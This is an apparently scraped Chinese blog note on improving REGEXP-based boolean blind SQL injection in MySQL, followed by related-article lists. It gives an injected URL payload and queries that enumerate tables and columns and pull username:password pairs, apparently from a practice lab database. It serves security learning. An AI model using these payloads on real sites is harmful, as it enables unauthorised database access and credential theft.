regexp盲注的一些改進
index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-z]' LIMIT 0,1) /*
這是以前看別人的文章寫的exp,以爲有點囉嗦,其實能夠很直白的寫php
select group_concat(table_name) from information_schema.tables where table_schema='security'; select((select group_concat(table_name) from information_schema.tables where table_schema='security') regexp binary '^e'); select group_concat(column_name) from information_schema.columns where table_name='users'; select((select group_concat(column_name) from information_schema.columns where table_name='users') regexp binary '^i'); select group_concat(username,':',password) from security.users; select((select group_concat(username,':',password) from security.users) regexp binary '^D');
幾個注意點mysql
1 能夠直接用group_concat所有匹配出來sql
2 mysql中用regexp是區分大小寫的,只有對取md5的時候不要緊,其餘時候要加上binary,不過取數據時就不用group_concat了,用limit一條一條取spa
3 regexp也能夠用二分法 '^[a-z]' 到 '^[a-h]'code
相關文章
- 1. sql 盲注之利用regexp獲得庫名,表名,列名
- 2. 一些我的盲點
- 3. 盲注----基於布爾的SQL盲注
- 4. python3修改多進程名稱的一些注意事項
- 5. 新手上路 盲注的一些基礎知識
- 6. CTF中幾種通用的sql盲注手法和注入的一些tips
- 7. 3.1 SQL盲注- 布爾盲注
- 8. sql注入---盲注
- 9. SQL注入---盲注
- 10. SQL注入:盲注
- 更多相關文章...
- • Spring DI(依賴注入)的實現方式:屬性注入和構造注入 - Spring教程
- • Hibernate的一級緩存 - Hibernate教程
- • Spring Cloud 微服務實戰(三) - 服務註冊與發現
- • RxJava操作符(一)Creating Observables
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
- 1. 跳槽面試的幾個實用小技巧,不妨看看!
- 2. Mac實用技巧 |如何使用Mac系統中自帶的預覽工具將圖片變成黑白色?
- 3. Mac實用技巧 |如何使用Mac系統中自帶的預覽工具將圖片變成黑白色?
- 4. 如何使用Mac系統中自帶的預覽工具將圖片變成黑白色?
- 5. Mac OS非兼容Windows軟件運行解決方案——「以VMware & Microsoft Access爲例「
- 6. 封裝 pyinstaller -F -i b.ico excel.py
- 7. 數據庫作業三ER圖待完善
- 8. nvm安裝使用低版本node.js(非命令安裝)
- 9. 如何快速轉換圖片格式
- 10. 將表格內容分條轉換爲若干文檔
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. sql 盲注之利用regexp獲得庫名,表名,列名
- 2. 一些我的盲點
- 3. 盲注----基於布爾的SQL盲注
- 4. python3修改多進程名稱的一些注意事項
- 5. 新手上路 盲注的一些基礎知識
- 6. CTF中幾種通用的sql盲注手法和注入的一些tips
- 7. 3.1 SQL盲注- 布爾盲注
- 8. sql注入---盲注
- 9. SQL注入---盲注
- 10. SQL注入:盲注